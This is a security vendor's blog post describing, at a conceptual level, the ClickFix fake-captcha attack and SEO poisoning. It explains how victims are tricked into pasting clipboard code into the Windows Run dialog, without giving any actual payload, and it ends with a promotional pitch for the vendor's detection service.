Threat Actors’ New “Fix,” So Easy It’s Addictive
A Look at the ClickFix Attack and SEO Poising
Attackers have so many tools available to them. Over the years, we’ve seen malicious PDFs, Business-Email-Chain phishing, Browser-in-Browser attacks, and many more—all pointing to some level of sophistication for bypassing the defenses that we as IT and IT security try to put into place. Then comes the latest attack that’s sweeping the internet: the ClickFix attack.
This attack preys on the ever-changing nature of the security landscape. With its two-factor authentication, SSO, passkeys and captchas, there’s no end to the number of ways we’ve made you verify your identity. So, what’s one more way? If you’re asked to paste into a window that opens up after using “Windows key + R”, it must just be another step in the never-ending verification process showing that you are, in fact, human.
The simplicity of this attack would make you assume that it wouldn’t be very effective. But from what Scinary’s security operations team has seen, this is far from the truth. Let’s go through the actual ClickFix attack chain.
ClickFix tends to prey on end-users wanting to find free resources online. For our education folks, think of a teacher looking for a free workpaper for students. The end-user types in “free science homework assignment” into Google, and they click on the first thing that pops up at the top. Sometimes the results are paid ads, and other times the attacker is leveraging SEO (search engine optimization) to get their malicious site and/or file in front of the victim. This form of propagation is called SEO poisoning.
The attacker is crafting their website and files in such a way that the search engine displays their malicious content at or near the top of the search results. Once the end user has clicked on the malicious webpage, as sometimes happens when first visiting a new site, they are met with the normal-looking “Verify you are a human” captcha. They click the check mark, verifying they are human. They are then shown a second window requiring them to prove it further, but unlike normal captchas, ClickFix does not ask you to type out a phrase or identify all the images of a “crosswalk.” Instead, it requires the end user to press “Windows key + R,” then “Ctrl + V,” and finally, “Enter.”
What has just happened is the unsuspecting end-user has just run malicious code within the Windows run utility that was secretly copied to their clipboard when opening the malicious website. This malicious code often leads to the download and execution of malware. As mentioned previously, this attack is extremely simplistic—but simplistic within the cybersecurity world often does not mean ineffective. In the case of ClickFix, this is especially true.
If you are a Scinary XDR customer, we detect and stop these attacks no matter the time, before they get bad—often without even needing to involve the IT teams. If you are interested in seeing how Scinary can partner with you, feel free to contact us!
